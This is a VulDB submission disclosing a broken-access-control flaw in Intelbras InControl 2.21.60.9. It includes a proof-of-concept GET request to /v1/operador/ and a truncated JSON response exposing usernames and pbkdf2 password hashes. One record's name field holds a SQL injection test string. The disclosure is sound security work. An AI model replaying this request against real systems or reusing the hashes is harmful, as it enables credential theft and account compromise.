Submeter #579544: Intelbras InControl 2.21.60.9 Information Disclosure

Título: Intelbras InControl 2.21.60.9 Information Disclosure
Descrição: There is a password hash disclosure in the InControl application. There are three types of users: Admin, Recepcionista and Porteiro. Every type of user can make a GET request to the users endpoint "/v1/operador/", which lists every user registered in the application. This endpoint returns a JSON object that contains a lot of information about the users, including id, username, password (hashed), and other information. The frontend hides the user listing from the Recepcionista role, but the API returns it anyway, which indicates the restriction is enforced only client-side and not by the server. Here is an example of the GET request with Recepcionista privileges (a role which, in the frontend, does not have permission to list users):

GET /v1/operador/ HTTP/1.1
Host: localhost:4441
Authorization: JWT eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.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.RyGjsE61f-d4QE6OWMCyp7Px_DjOEYMhmSGPIiCJzcc
Accept-Language: pt-BR,pt;q=0.9
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Origin: https://localhost:4445
Referer: https://localhost:4445/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

And here is an example of the HTTP response with disclosure of password hashes:

HTTP/1.1 200 OK
Date: Fri, 16 May 2025 19:02:07 GMT
Server: Apache/2.4.62 (Win32) OpenSSL/3.1.6 mod_wsgi/4.7.1 Python/3.7
Vary: Accept,Origin,Cookie
Allow: GET, POST, DELETE, HEAD, OPTIONS
Content-Length: 40484
Access-Control-Allow-Origin: *
X-Frame-Options: SAMEORIGIN
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json

{"message":null,"data":[{"id":3,"pessoa":{"id":5,"nome_completo":"arnaldo","email":"[email 
protected]","telefone_celular":null,"telefone_residencial":null,"grupo":null,"imagem":null,"empresa":null,"tem_pendencias":false},"user":{"id":3,"username":"cesar","password":"pbkdf2_sha256$150000$O4xokjpfyafm$L1/My9lbtYx/dcJTOW45QaC2N6qWf2KtIScfaA6FCV0=","groups":{"id":3,"name":"Recepcao","permissions":[{"id":268,"codename":"view_controleremoto","content_type":{"id":67,"app_label":"credencial","model":"controleremoto"}},{"id":249,"codename":"add_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":250,"codename":"change_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":251,"codename":"delete_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":252,"codename":"view_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":181,"codename":"add_historicaleventooperador","content_type":{"id":46,"app_label":"evento_operador","model":"historicaleventooperador"}},{"id":182,"codename":"change_historicaleventooperador","content_type":{"id":46,"app_label":"evento_operador","model":"historicaleventooperador"}},{"id":183,"codename":"delete_historicaleventooperador","content_type":{"id":46,"app_label":"evento_operador","model":"historicaleventooperador"}},{"id":184,"codename":"view_historicaleventooperador","content_type":{"id":46,"app_label":"evento_operador","model":"historicaleventooperador"}},{"id":297,"codename":"add_historicalgrupopontosacesso","content_type":{"id":75,"app_label":"grupo_pontos_acesso","model":"historicalgrupopontosacesso"}},{"id":298,"codename":"change_historicalgrupopontosacesso","content_type":{"id":75,"app_label":"grupo_pontos_acesso","model":"historicalgrupopontosacesso"}},{"id":299,"codename":"delete_historicalgrupopontosacesso","content_type":{"id":75,"app_label":"grupo_pontos_aces
so","model":"historicalgrupopontosacesso"}},{"id":300,"codename":"view_historicalgrupopontosacesso","content_type":{"id":75,"app_label":"grupo_pontos_acesso","model":"historicalgrupopontosacesso"}},{"id":117,"codename":"add_campospersonalizados","content_type":{"id":30,"app_label":"usuario","model":"campospersonalizados"}},{"id":118,"codename":"change_campospersonalizados","content_type":{"id":30,"app_label":"usuario","model":"campospersonalizados"}},{"id":119,"codename":"delete_campospersonalizados","content_type":{"id":30,"app_label":"usuario","model":"campospersonalizados"}},{"id":120,"codename":"view_campospersonalizados","content_type":{"id":30,"app_label":"usuario","model":"campospersonalizados"}},{"id":129,"codename":"add_usersgroup","content_type":{"id":33,"app_label":"usuario","model":"usersgroup"}},{"id":130,"codename":"change_usersgroup","content_type":{"id":33,"app_label":"usuario","model":"usersgroup"}},{"id":131,"codename":"delete_usersgroup","content_type":{"id":33,"app_label":"usuario","model":"usersgroup"}},{"id":132,"codename":"view_usersgroup","content_type":{"id":33,"app_label":"usuario","model":"usersgroup"}}]},"is_active":true,"is_superuser":false}},{"id":2,"pessoa":{"id":4,"nome_completo":"' OR '1'='1'--","email":"[email 
protected]","telefone_celular":null,"telefone_residencial":null,"grupo":null,"imagem":null,"empresa":null,"tem_pendencias":false},"user":{"id":2,"username":"admin2","password":"pbkdf2_sha256$150000$7iR10NcRJoQY$ccO4sUbudTm2Qh+Lq66Thh1YQqvkBTOk8xxCaLugQ3E=","groups":{"id":1,"name":"Administrador","permissions":[{"id":37,"codename":"add_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":38,"codename":"change_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":39,"codename":"delete_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":40,"codename":"view_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":385,"codename":"add_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":386,"codename":"change_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":387,"codename":"delete_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":388,"codename":"view_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":45,"codename":"add_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":46,"codename":"change_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":47,"codename":"delete_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":48,"codename":"view_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":53,"codename":"add_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":54,"codename":"change_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":55,"codename
":"delete_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":56,"codename":"view_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":49,"codename":"add_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":50,"codename":"change_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":51,"codename":"delete_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":52,"codename":"view_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":321,"codename":"add_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":322,"codename":"change_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":323,"codename":"delete_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":324,"codename":"view_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":345,"codename":"add_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":346,"codename":"change_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":347,"codename":"delete_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":348,"codename":"view_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":354,"codename":"change_progressocomunicacao","content_type":{"id":89,"app_label":"comunicacao_progress","model":"progressocomunicacao"}},{"id":261,"codename":"add_assusersdkdispositivosdk","content_type":{"id":66,"app_label":"credencial","model":"assusersdkdispositivosdk"}},{"id":262,
Fonte: https://localhost:4441/v1/operador/
Utilizador: lorenzomoulin (UID 33175)
Submissão: 16/05/2025 21h07 (há 11 meses)
Moderação: 04/08/2025 07h41 (3 months later)
Estado: Aceite
Entrada VulDB: 318641 [Intelbras InControl 2.21.60.9 JSON Endpoint /v1/operador/ Divulgação de Informação]
Pontos: 20
